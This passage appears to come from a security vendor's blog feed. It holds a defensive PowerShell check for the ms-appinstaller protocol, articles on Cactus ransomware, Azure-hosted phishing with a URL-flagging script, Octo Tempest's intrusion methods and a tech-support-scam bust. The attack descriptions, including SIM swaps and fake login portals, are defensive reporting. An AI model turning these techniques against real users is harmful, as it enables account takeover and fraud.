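# Not part of the original article. Run from an elevated PowerShell prompt.
param([switch]$Enforce)   # script's own switch: apply the policy instead of only reporting

$FixedVersion = [version]'1.21.3421.0'                                   # from the article
$PolicyKey    = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppInstaller'  # assumed policy location
$PolicyValue  = 'EnableMSAppInstallerProtocol'

function Get-AppInstallerStatus {
    # App Installer ships as Microsoft.DesktopAppInstaller; several versions may be staged, take the newest.
    $pkg = Get-AppxPackage -Name Microsoft.DesktopAppInstaller -AllUsers -ErrorAction SilentlyContinue |
           Sort-Object { [version]$_.Version } -Descending | Select-Object -First 1
    $installed = if ($pkg) { [version]$pkg.Version } else { $null }

    $policy = Get-ItemProperty -Path $PolicyKey -Name $PolicyValue -ErrorAction SilentlyContinue
    $policyState = if ($null -eq $policy)                 { 'NotConfigured' }
                   elseif ($policy.$PolicyValue -eq 0)   { 'Disabled' }
                   else                                   { 'Enabled' }

    # Informational: whether a handler for the scheme is registered at all.
    $handlerRegistered = Test-Path 'Registry::HKEY_CLASSES_ROOT\ms-appinstaller'

    $versionHasFix = ($null -ne $installed) -and ($installed -ge $FixedVersion)
    [pscustomobject]@{
        AppInstallerVersion = $installed
        VersionHasFix       = $versionHasFix
        PolicyState         = $policyState
        HandlerRegistered   = $handlerRegistered
        # Protected if policy disables the protocol, or the fixed build is present and policy does not re-enable it.
        Protected           = ($policyState -eq 'Disabled') -or ($versionHasFix -and $policyState -ne 'Enabled')
    }
}

function Disable-MSAppInstallerProtocol {
    if (-not (Test-Path $PolicyKey)) { New-Item -Path $PolicyKey -Force | Out-Null }
    New-ItemProperty -Path $PolicyKey -Name $PolicyValue -PropertyType DWord -Value 0 -Force | Out-Null
}

$status = Get-AppInstallerStatus
$status | Format-List
if (-not $status.Protected) {
    if ($Enforce) {
        Disable-MSAppInstallerProtocol
        Write-Output 'Policy applied; re-checking:'
        Get-AppInstallerStatus | Format-List
    } else {
        Write-Warning "Host is exposed: update App Installer to $FixedVersion or later, or re-run with -Enforce to disable the protocol by policy."
    }
}
```

The version check alone is not enough, which is why the script also reads the policy: an explicit Enabled value would switch the handler back on even on a fixed build, so a fleet-wide report should show both columns.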

Is This Vulnerability Dangerous?

It is, and the list of threat actors exploiting it makes that clear. Most of the time it is used to install backdoors and RATs, which act as open gates for more malicious programs. Even though the current attacks aim mostly at corporations, nothing stops cybercriminals from turning the same technique against home users.

To stay protected against such attacks, it is vital to install the latest patches and keep an eye on cybersecurity news; as you can see, any critical vulnerability almost always makes the headlines.

As a layer of reactive protection, I can recommend an advanced security solution. A package that carries a valid signature is hard to catch by signature analysis alone, but the malware is fairly easy to uncover at run time with a heuristic detection system. GridinSoft Anti-Malware is a solution that provides this kind of protection.

Cactus Ransomware Attacks – Microsoft Alerts
https://gridinsoft.com/blogs/microsoft-alerts-cactus-ransomware/
Wed, 06 Dec 2023 15:39:14 +0000

Microsoft has raised the alarm about a growing wave of ransomware attacks utilizing malvertising tactics to spread Cactus ransomware. The sophisticated malware campaign hinges on deploying DanaBot as an initial access vector, orchestrated by the ransomware operator Storm-0216, also known as Twisted Spider or UNC2198.

Cactus Ransomware Deployed by DanaBot

Microsoft’s Threat Intelligence team has disclosed an escalating wave of Cactus ransomware attacks. It is orchestrated by the notorious ransomware operator Storm-0216, a.k.a. Twisted Spider / UNC2198. The campaign employs malvertising, using DanaBot as the entry point for the ransomware deployment.

Image: The Cactus ransom note

What makes Cactus particularly concerning is its ability to bypass antivirus software and exploit known vulnerabilities in VPN appliances to gain initial access to a network. Also, security experts have discovered that Cactus ransomware attacks exploit vulnerabilities in Qlik Sense, a data analytics platform. It is crucial to regularly update and patch software to protect against evolving ransomware threats.

What is DanaBot Malware?

DanaBot, identified by Microsoft as Storm-1044, stands as a multifaceted threat comparable to infamous counterparts like Emotet, TrickBot, QakBot, and IcedID. This malware operates as both a data stealer and a conduit for subsequent payloads. UNC2198, a threat group associated with DanaBot, has a track record of infecting endpoints with IcedID, a precursor to deploying ransomware families like Maze and Egregor, as previously outlined by Mandiant, a subsidiary of Google.

Image: Example of fake ads that try to mimic the original site’s URL

Microsoft’s intelligence suggests a transition from QakBot to DanaBot, likely triggered by a concerted law enforcement operation in August 2023 that dismantled QakBot’s infrastructure. The ongoing DanaBot campaign, observed since November, notably employs a private version of the info-stealing malware, diverging from the conventional malware-as-a-service approach.

Protective Measures

Microsoft’s recommendations include regular software updates and patches, robust security implementations, and comprehensive employee training to fortify defenses against phishing attempts.

  1. Regularly back up your data offline to protect it. If ransomware attacks your computer, the backup files will not be affected, and you can restore them without paying a ransom.
  2. It is important to conduct regular cybersecurity awareness training for employees to educate them about ransomware threats and safe online practices.
  3. Employ network monitoring tools to identify suspicious activities and potential indicators of compromise, allowing for proactive threat detection.

What is Microsoft Security Warning Scam?
https://gridinsoft.com/blogs/microsoft-security-warning-scam/
Wed, 08 Nov 2023 22:51:47 +0000

Fraudsters massively employ Microsoft Azure hosting to launch Microsoft Security scam pages. They range from a scary warning that blocks your browser window to phishing pages indistinguishable from the real ones. Let’s look at the most typical types of these scams and their features.

What is Windows Defender Security Warning?

Fake Windows Defender Security Warning (Microsoft Security Warning) is a malicious attempt to deceive users into believing their system is compromised or at risk. In reality, these warnings are part of a scam. Cybercriminals create deceptive pop-up notifications or messages that mimic the appearance and language of genuine Windows Defender alerts. These counterfeit warnings often use scare tactics.

Image: The classic example of the Microsoft Security Warning scam

Usually, such sites claim the presence of malware, viruses, or security breaches on the user’s system. They aim to trick users into taking immediate, unwarranted actions: clicking on malicious links, downloading fraudulent software, or providing sensitive information like login credentials or credit card details.

What makes these fake warnings even more convincing is the abuse of Microsoft Azure services. In short, Microsoft Azure is a reputable cloud computing platform that provides tools and services for legitimate purposes, including hosting websites and applications. However, cybercriminals exploit Azure’s flexibility to host their malicious landing pages and phishing sites, thereby lending an air of legitimacy to their schemes.

By leveraging Azure, scammers can secure SSL certificates and create deceptive subdomains, making their fake security warnings appear more convincing. They use Azure to build seemingly genuine login forms and landing pages, often targeting users with Microsoft, Office 365, Outlook, or OneDrive accounts.

How Does This Scam Work?

There are two most common scenarios for this kind of scam, and we’re going to look at them now.

Fake Login Page

In the first common scenario, attackers launch spam email campaigns that appear to originate from a reputable organization. For example, these scammers do their best to trap victims by mimicking the official login pages for Microsoft, Office 365, Outlook, and OneDrive. More often than not, these pages are indistinguishable from the real thing. For example, they may have a Microsoft logo, the correct color schemes, and even a nearly identical URL. Many users may genuinely believe they are on a legitimate Microsoft page.

Image: Fake login page

To make their attacks even more convincing, attackers use Transport Layer Security (TLS) certificates. These certificates enable encrypted connections between a user and a website and are often taken as an indicator of trust. In this case, the certificates issued by Microsoft Azure TLS Issuing CA 05 for the *.1.azurestaticapps.net domain make the fake pages indistinguishable from the real ones. Attackers go even further, adapting their phishing pages to target users of other platforms such as Rackspace, AOL, Yahoo, and other email services. There, the spoofing is particularly well camouflaged thanks to legitimate Microsoft-issued certificates.

When users are trying to determine if a phishing attack is targeting them, they are usually advised to carefully check the URL in the browser bar when prompted to enter credentials. However, in the case of phishing campaigns abusing Azure Static Web Apps, this advice is meaningless, as the azurestaticapps.net subdomain and the presence of a valid TLS security certificate will fool many users.
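The PowerShell below is an added example, not code from the original post: a triage helper a SOC or mail gateway could run over links before users reach them. It encodes the point made above, that a valid certificate under *.1.azurestaticapps.net says nothing about the brand on the page, so a brand-looking hostname on a shared-hosting suffix is flagged rather than trusted. The allow-list, the second hosting suffix and the sample URLs are constructed for this example.

```powershell
# Added example (not from the original post): flag login URLs where a
# brand-looking page sits on a shared-hosting subdomain, the pattern the
# article describes for *.1.azurestaticapps.net. The allow-list, the extra
# hosting suffix and the sample URLs are constructed for this example.

# Hosts where Microsoft account / Office 365 / Outlook / OneDrive sign-in
# legitimately happens (assumed allow-list; adapt to your environment).
$LegitimateLoginHosts = @(
    'login.microsoftonline.com', 'login.live.com', 'login.microsoft.com',
    'account.microsoft.com', 'outlook.live.com', 'outlook.office.com',
    'onedrive.live.com'
)

# Suffixes under which anyone can publish a site and get a valid TLS
# certificate: the padlock proves nothing about the brand shown on the page.
$SharedHostingSuffixes = @('azurestaticapps.net', 'azurewebsites.net')

# Brand or sign-in words that are suspicious in a hostname outside the allow-list.
$BrandKeywords = @('microsoft', 'office', 'outlook', 'onedrive', 'signin', 'login')

function Test-LoginUrl {
    param([Parameter(Mandatory)][string]$Url)

    $uri = $null
    if (-not [System.Uri]::TryCreate($Url, [System.UriKind]::Absolute, [ref]$uri)) {
        return [pscustomobject]@{ Url = $Url; Verdict = 'Unparseable'; Reasons = @('not an absolute URL') }
    }
    $hostName = $uri.Host.ToLowerInvariant()

    # Exact match only: a look-alike such as login.microsoftonline.com.evil.example must not pass.
    if ($LegitimateLoginHosts -contains $hostName) {
        return [pscustomobject]@{ Url = $Url; Verdict = 'Allow'; Reasons = @('host is on the sign-in allow-list') }
    }

    $reasons = New-Object System.Collections.Generic.List[string]
    if ($uri.Scheme -ne 'https') { $reasons.Add('credentials requested over plain HTTP') }

    $shared = @($SharedHostingSuffixes | Where-Object { $hostName -eq $_ -or $hostName.EndsWith(".$_") })
    if ($shared.Count -gt 0) {
        $reasons.Add("shared-hosting suffix $($shared[0]): a valid TLS certificate does not vouch for the brand")
    }

    $labels = $hostName.Split('.')
    $brandHits = @($BrandKeywords | Where-Object { $w = $_; @($labels | Where-Object { $_ -like "*$w*" }).Count -gt 0 })
    if ($brandHits.Count -gt 0) {
        $reasons.Add("brand/sign-in keywords in a non-allow-listed host: $($brandHits -join ', ')")
    }

    # Two independent signals (e.g. shared hosting plus brand words) -> Block; one -> Review.
    $verdict = switch ($reasons.Count) { 0 { 'Unknown' } 1 { 'Review' } default { 'Block' } }
    [pscustomobject]@{ Url = $Url; Verdict = $verdict; Reasons = $reasons.ToArray() }
}

# Constructed sample URLs, not indicators from any real campaign.
$samples = @(
    'https://login.microsoftonline.com/common/oauth2/authorize',   # Allow
    'https://outlook-office365-signin.1.azurestaticapps.net/',     # Block
    'https://brave-tree-0a1b2c3d.1.azurestaticapps.net/',          # Review
    'http://example.net/account'                                    # Review
)
$samples | ForEach-Object { Test-LoginUrl -Url $_ } | Format-Table Url, Verdict, Reasons -AutoSize -Wrap
```

The Allow branch deliberately requires an exact host match, because the article's point is that suffix checks and the padlock alone are what the Azure Static Web Apps campaigns defeat.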

Tech Support Scam

The fake Microsoft Technical Support scam involves a scheme in which attackers impersonate Microsoft representatives or certified technicians. Usually, it starts with a phishing site that displays a fake Microsoft Security Warning, which leads the victim to call the scammers in the hope of getting help with the “problem”. Scammers may use a variety of techniques to gain the attention and trust of potential victims. Sometimes they also call random users, claim that the user’s computer has serious problems, viruses, or security breaches, and offer to help resolve them.

To “help” users, scammers may ask permission to control the computer remotely. If the user agrees, attackers gain full access to the system and can install malware or steal personal data. In addition, scammers often ask the user to provide personal information such as credit card numbers, passwords, addresses, and other sensitive information.

How To Avoid These Scams?

To avoid falling victim to phishing scams like the ones abusing Azure Static Web Apps, it’s essential to follow best practices for online security and remain vigilant. Here are some steps you can take to protect yourself:

  • Check URLs before entering data. You should check the URL in the address bar when you’re asked to enter your account credentials on a login page. Look for any unusual subdomains or misspellings that could indicate a phishing site. Ensure that the domain is the official one for the service you’re using.
  • Be careful with suspicious emails. Please don’t click on links or download attachments from unsolicited or unexpected emails. Always verify the legitimacy of an email, even if it appears to come from a trusted source.
  • Verify the Source. When you receive an email requesting sensitive information or actions, contact the supposed sender directly through official channels to verify the request’s authenticity.
  • Use a Password Manager. This lets you create strong, unique passwords for your online accounts, so a single compromised password cannot affect multiple accounts.
  • Enable Two-Factor Authentication. Whenever possible, enable 2FA for your online accounts. This adds another layer of security and requires a second form of verification, such as a temporary code sent to your phone.
  • Educate Yourself. It is crucial to keep yourself updated on the latest phishing techniques and common scam tactics to stay informed and protected. Be vigilant and cautious while browsing the internet or dealing with suspicious emails or messages. The more you know, the better you can protect yourself.
  • Use Security Software. We recommend installing reputable anti-malware solutions on your devices. They can help detect and block malicious websites and emails.
  • Keep Software Updated. Keep your operating system, web browsers, and security software up-to-date. This ensures that any known vulnerabilities are fixed.

By following these precautions and maintaining a healthy level of skepticism, you can significantly reduce the risk of falling victim to phishing scams. Cybercriminals continuously adapt their tactics, so staying vigilant is essential to your online security.

Octo Tempest Threat Actor – The Most Dangerous Cybercrime Gang?
https://gridinsoft.com/blogs/octo-tempest-threat-actor/
Mon, 30 Oct 2023 17:49:58 +0000

Octo Tempest, a financially-motivated hacking group, has been labeled “one of the most dangerous financial criminal groups” by Microsoft. Known as UNC3944 and 0ktapus, the group has gained attention for bold cyber attacks.

What is Octo Tempest Cybercrime Gang?

Octo Tempest’s journey into the world of cybercrime is an intriguing one. Only a few months ago, it became the first English-speaking affiliate of the BlackCat ransomware gang. This collaboration marks a rare occurrence in the cybercriminal ecosystem, as historically, Eastern European ransomware groups have been reluctant to do business with native English-speaking criminals.

Octo Tempest’s modus operandi is characterized by well-organized and prolific attacks, reflecting a depth of technical expertise and the involvement of multiple operators with hands-on-keyboard skills. The group first appeared on the radar in early 2022, initially targeting mobile telecommunications and business process outsourcing organizations for SIM swaps. Notably, their activities were traced to ransomware attacks against Las Vegas casinos in September of the same year.

Evolution of Octo Tempest

However, their ambitions did not stop there. In 2022, Octo Tempest orchestrated a large-scale campaign that compromised over 130 organizations, including prominent names like Twilio and Mailchimp, highlighting the group’s capacity to wreak havoc on a grand scale.

Collaboration with BlackCat and Ransomware Deployment

A significant turning point in Octo Tempest’s cybercriminal career was its collaboration with BlackCat, also known as ALPHV. The group began deploying ransomware payloads developed by BlackCat, extending their focus to both Windows and Linux systems. More recently, Octo Tempest has directed its efforts towards VMware ESXi servers.

Octo Tempest remains financially motivated, with diverse monetization techniques. Their activities span from cryptocurrency theft to data exfiltration for extortion and ransomware deployment.

Octo Tempest Methods of Initial Access

Octo Tempest employs a range of methods for gaining initial access, including:

  • Installing remote monitoring and management utilities.
  • Navigating to fake login portals using an adversary-in-the-middle toolkit.
  • Purchasing stolen employee credentials or session tokens on the dark web.
  • Conducting SMS phishing campaigns targeting employee phone numbers with links to fake login portals.
  • Leveraging SIM swaps or call forwarding on an employee’s phone number.
  • Initiating a self-service password reset once control of the employee’s phone number is established.

Fear-Mongering Tactics and Reconnaissance

In rare instances, Octo Tempest resorts to fear-mongering tactics, targeting specific individuals through phone calls, texts, and even physical threats to coerce victims into sharing their credentials for corporate access.

Upon gaining initial access, the group proceeds with a meticulous reconnaissance process. It includes enumerating hosts and services, collecting information, and identifying documents related to network architecture, employee onboarding, remote access methods, password policies, and credential vaults. Their access to internal networks allows them to carry out broad searches across knowledge repositories to gather intelligence about the target’s infrastructure.

Defending Against Octo Tempest

Detecting and defending against Octo Tempest is no easy task due to their use of social engineering, living-off-the-land techniques, and a diverse toolkit. However, cybersecurity experts offer guidelines to help organizations detect and combat this rising cyber threat.

  • Monitoring and reviewing identity-related processes, Azure environments, and endpoints are crucial steps in bolstering defenses against Octo Tempest.
  • Educate yourself and your employees about social engineering and phishing tactics commonly used by Octo Tempest. Regular training on recognizing suspicious emails and links can help prevent successful attacks.
  • Keep your operating systems, software, and applications up to date with the latest security patches. Cybercriminals often exploit known vulnerabilities in outdated software.
  • Use a firewall to monitor and filter incoming and outgoing network traffic. Intrusion detection and prevention systems (IDPS) can also help detect suspicious activities.
  • Regularly back up your data, both on-site and off-site. In the event of a ransomware attack, having clean, uninfected backups can save your data.
  • Stay informed about emerging threats and vulnerabilities by monitoring cybersecurity news and threat intelligence feeds. This can help you adapt your defenses to evolving threats.

Fake Amazon and Microsoft Tech Support call centers busted
https://gridinsoft.com/blogs/fake-amazon-microsoft-tech-support-busted/
Tue, 24 Oct 2023 18:22:22 +0000

Amazon and Microsoft are partnering with the CBI to crack down on multiple tech support call center scams across India. These call centers target customers of Amazon and Microsoft, two of the largest companies in the tech industry, and have defrauded more than 2,000 Amazon and Microsoft customers, mainly in the US.

Fake Amazon and Microsoft call centers busted

Indian authorities, in collaboration with Amazon and Microsoft, conducted Operation Chakra-II to crack down on 76 illegal call centers across at least 11 states in India. These call centers posed as tech support for Amazon and Microsoft customers and defrauded over 2,000 individuals. This marks the first time two major companies have collaborated to combat online and tech support fraud. The Central Bureau of Investigation of India (CBI) led the Chakra-II operation.

Image: CBI’s post about the start of the Chakra-II operation

Microsoft said:

“The joint referral enabled the exchange of actionable intelligence and insights with CBI and other international law enforcement agencies to help them take action at scale. We firmly believe that partnerships like these are not only necessary but pivotal in creating a safer online ecosystem and in extending our protective reach to a larger number of individuals.”

On the other hand, Amazon said this:

“Together, the companies are setting a precedent for the power of industry collaboration and the collective impact it can have in holding bad actors accountable. Amazon will remain vigilant and persistent in our efforts to stay one step ahead of fraudsters, but we cannot win this fight alone. We encourage others in the industry to join us as a united front against criminal activity.”

Country-level scam

Almost every user has probably seen the “Hello Your Computer Has Virus” meme or the jokes about Indian men calling people and introducing themselves as Microsoft tech support. India has become fertile ground for a thriving network of scammers, and the Indian tech support scam can be considered a worthy competitor to the Nigerian Prince scam. Primarily, scammers run illegal operations from call centers masquerading as legitimate businesses.

Image: that same meme

According to the FBI, tech support fraud victims lost more than $1 billion in the US last year, with scammers mainly targeting older people. Nearly half of the victims were over 60, and they accounted for 69%, or more than $724 million, of the losses. Many of these scams target customers of Amazon and Microsoft, two of the largest companies in the tech industry. Unsurprisingly, these companies have banded together for the first time to fight against these scams.

How did this scam work?

The Central Bureau of Investigation (CBI) recently revealed that fraudsters have been pretending to be Amazon and Microsoft customer service agents. They have been contacting victims through online pop-up messages that appear to be real security alerts from these companies. The pop-up message claims that the user’s computer is experiencing technical issues and provides a toll-free number to contact customer support. However, the phone number actually belongs to the fraudsters’ electronic call centers. By the way, we have an article dedicated to breaking down this scam scheme.

Once the victim calls, the scammers use some trickery to gain remote access to the victim’s computer and show them fake problems. They then charge the victim hundreds of dollars for fake solutions that were never needed in the first place. This fraudulent activity has allegedly been going on for the past five years. The fraudsters use various international payment gateways and channels to move the illegally obtained funds.

CBI exposes fake call centers

As part of five separate cases, a nationwide crackdown was conducted in Delhi, Punjab, Haryana, Himachal Pradesh, Uttar Pradesh, Madhya Pradesh, Karnataka, Kerala, Tamil Nadu, and West Bengal, which resulted in the confiscation of 32 mobile phones, 48 laptops/hard disks, 33 SIM cards, and pen drives. The operation also seized numerous bank accounts alongside 15 email accounts that were associated with the scammer network.

While the CBI did not disclose the number of arrests made during the operation, it was revealed that the illegal call centers had targeted more than 2,000 Amazon and Microsoft customers. The victims primarily reside in the US, Australia, Canada, Germany, Spain, and the UK. Amazon also confirmed that it had removed over 20,000 phishing websites and 10,000 phone numbers from impersonation schemes in 2022. The company reported hundreds of attackers worldwide to authorities.

Is it the end of Amazon/Microsoft Tech Support scams?

Not really. Frauds like this are exceptionally profitable, so there will always be a temptation to restart them. Sure, the current con artists are detained, but nature abhors a vacuum: where one group of crooks is gone, another pops up rather quickly.

Still, the myth of impunity these guys relied on is now busted. Future scams will be more concealed, more distributed, and/or reliant on less traceable technologies. Will they be more effective with all these upgrades? That is what we are about to discover.
